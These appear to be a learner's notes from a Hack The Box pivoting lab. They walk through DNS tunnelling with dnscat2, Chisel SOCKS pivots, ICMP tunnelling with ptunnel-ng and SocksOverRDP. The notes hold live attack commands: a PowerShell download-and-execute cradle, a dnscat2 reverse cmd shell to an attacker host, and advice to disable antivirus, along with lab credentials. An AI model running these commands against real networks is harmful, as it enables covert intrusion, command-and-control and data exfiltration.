Branching out our tunnels

DNS tunneling Dnscat2

• Dnscat2 is a tunnelling tool that utilizes DNS protocols to send data between two hosts

• it uses an encrypted C2 channel and sends data inside TXT records within the DNS protocol

• In dnscat2, when address resolution is requested from an external server, it typically involves the compromised system (agent or implant) making DNS queries to the dnscat2 server to resolve domain names. The DNS protocol, which is normally used to translate human-readable domain names into IP addresses, is repurposed to carry covert communication between the compromised system and the command-and-control (C2) server.

example

• we will download the dnscat2 repo

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install

• we can start a Dnscat2 server on our local machine (attacking machine) by executing the dnscat2 file

sudo ruby dnscat2.rb --dns host=10.10.14.26,port=53,domain=inlanefreight.local --no-cache

After we have the server running, this will provide us with a sercret key, which we will have to provide to the dnscat2 client when we deploy it on the windows client, this key essentailly handles authenticates and encrypts the data that is sent to our external dnscat2 server

• we can utilize the dnscat-powershell, a dnscat2 compatible PowerShell client that we can run from windows targets to establish a tunnel with our dnscat2 server, lets clone the project

sudo git clone https://github.com/lukebaggett/dnscat2-powershell.git

• currently i have a rdp session on the already compromised host, Now we need to import the dnscat2.ps1 module onto the system

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.26/dnscat2.ps1')

• Now that dnscat2,ps1 is imported, we can now use it to establish a tunnel with the server running on our attack host, we can send back a cmd shell session to our server

Start-Dnscat2 -DNSserver 10.10.14.26 -Domain inlanefreight.local -PreSharedSecret 938a1271da9a24b62250e22e7aeef915 -Exec cmd

if we look back at our dnscat2 server we can see we got a successful hit, and we have a shell on the system

SOCKS5 tunnelling with Chisel

• chisel is a TCP/UDP-based tunnelling tool written in go, that uses HTTP to transport data that is secure using SSH

scenario

We have compromised a public-facing server (ubuntu machine) and we want to pivot into the internal subnet of 172.16.5.0/23, since we have already compromised the public facing server we can use this as a chisel server (pivot point) which will listen on a specific port and forward our traffic to the internal subnet of 172.16.5.0/24 through an established tunnel

• Setting up chisel, clone repo, build binary

#cloen the repo
sudo git clone https://github.com/jpillora/chisel.git
#building the chisel binary
cd chisel
sudo go build

• Now that our binary is built we can transfer it to the compromised host (pivot point)

• Running our chisel server (pivot host)

./chisel server -v -p 1234 --socks5

(error) we did come acrss the following error, when we try to deploy the chisel server on the pivot host

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

• easy fix, just download an older version of chisel from

sudo https://github.com/jpillora/chisel/releases/tag/v1.7.4
sudo gzip -d chisel_1.7.4_linux_amd64.gz
mv chisel_1.7.4_linux_amd64 chisel
sudo chmod +x chisel

Now our chisel server will listen for incoming connections on port 1234 using SOCKS5 and forward it out to all the networks that are reachable from the pivot host.

• We can now start our chisel client (us, attack host) and connect to the chisel server (pivot host)

./chisel client -v 10.129.130.77:1234 socks

within the chisel output we should see where chisel specified a local port on our machine (attack host) that's listening for incoming traffic, from here we can make a new entry into our / /etc/proxychains.conf file

• directing proxychains to our clients listening port

• we should be able to interact with the internal subnet

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Chisel Reverse Pivot

Now there may come in the future where say firewall rules restrict inbound connections to our compromised targets, in such cases we can use Chisel with the reverse option enabled

--reverse

starting the Chisel server on our attack host

sudo ./chisel server --reverse -v -p 1234 --socks5

then we can can connect from our public facing server we have compromised (pivot host) to our attack host (chisel server) using the R:socks option

• Connecting the Chisel client to our attack host

./chisel client -v 10.10.14.26:1234 R:socks

• Now we can configure our /etc/proxychains.conf file

• Now we should have the ability to interact with the internal subnet

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

ICMP Tunnelling with SOCKS

ICMP tunnelling encapsulates our traffic with ICMP packets containing echo requests and responses

• ICMP tunnelling will only work when ping responses are permitted within the firewalled network

• When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server m then the external server can validate this traffic and send an appropriate response, which proves very useful for data exfiltration and creating pivoting tunnels to an external server.

• For this we will utilize the ptunnel-ng tool to create a tunnel between the external facing server (ubuntu) and our attack host (us), from which we should be able to proxy our traffic through the ptunnel-ng client

lets set up ptunnel-ng on our host machine

sudo apt-get install ptunnel-ng

we can copy the binary into our working directory

cp /usr/bin/ptunnel-ng ./ 

Lets transfer the tool to our pivot host (ubuntu)

scp -r ptunnel-ng ubuntu@10.129.130.77:~/

Now with ptunnel on our pivot host we can start the server-side of the ICMP tunnel on our pivot host

sudo ./ptunnel-ng -r10.129.130.77 -R22

• -r: should be the IP we want ptunnel-ng to accept connections on

• -R: specifying the port for our attack machine to connect to

Within our attack machine (us) we can no connect to the ptunnel-ng server

sudo ptunnel-ng -p10.129.130.77 -l2222 -r10.129.130.77 -R22

• -p: Specifying the IP address of the machine (our pivot host) running the ptunnel-ng server, this machine will receive our incoming requests

• -l 2222: specifying the local port on our machine to listen for incoming connections, connecting through port 2222 allows us to send traffic through the ICMP tunnel

• -r: specifies the IP address of the ptunnel-ng server to which the tunnelled connections will be forwarded

• -R: Specifies the remote port on our ptunnel-ng server to which the tunnelled connection

with the tunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target through SSH through local port 2222

ssh -p2222 -lubuntu 127.0.0.1

• we can also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various

Enabling Dynamic Port Forwarding over SSH

ssh -D 9050 -p2222 -lubuntu 127.0.0.1

• Now we can configure our proxychains file

RDP and SOCKS Tunnelling with SocksOverRDP

Often times during an engagement we may be limited to a windows network and may not have SSH enabled for pivoting, We should use tools available for Windows operating systems in these cases.

• SocksOverRDP is an example of a tool that uses Dynamic Virtual Channels (DVC) from a Remote Desktop Service feature of windows

• DVC is responsible for tunnelling packets over RDP connection, we can also utilize DVC to tunnel arbitrary packets over the network

• We can use SocksOverRDP to tunnel our custom packets and then proxy through it

• we can utilize tools such as Proxifier as our proxy server

1. Lets download the appropriate binaries to our attack host to perform this attack having the binaries on our attack host will allow us to transfer them to each target where needed

• https://github.com/nccgroup/SocksOverRDP/releases
• https://www.proxifier.com/download/#win-tab

we should have both zip files on our attack host

1. lets connect to the target machine (pivot host) via RDP and copy the SocksOverRDPx64.zip file over

xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.214.27

• we can just copy and paste the zip files in our RDP session

1. we need to load the SocksOverRDP.dll using regsvr32.exe as administrator cmd.exe session

regsvr32.exe SocksOverRDP-Plugin.dll

• we should receive the following prompt that our plugin is enabled, and it will listen on localhost:1080

• remember to disable real-time virus protection

1. Now we can connect to 172.16.5.19 (Domain controller, pivot host) over RDP using mstsc.exe

1. Now we need to transfer over our SocksOverRDP-Server.exe we

• copy and paste the file

• Now we can run it in administrative cmd prompt

.\SocksOverRDP-Server.exe

1. We can confirm that we have a SOCKS listener on the workstation (pivot point, initial foothold) by running netstat

1. After starting our listener, we can now configure Proxifier on our initial foothold to forward all our packets from 127.0.0.1:1080

• Profixier will route through the the given host and port

to configure Proxifier we need to click "Profile" -> "Proxy server" -> "Add" ->

• With Proxifier configured and running, we can connect to the domain controller via RDP, and it will use Proxifier to pivot all of our won traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which then will route it to 172.16.6.155 using SocksOverRDP-server.exe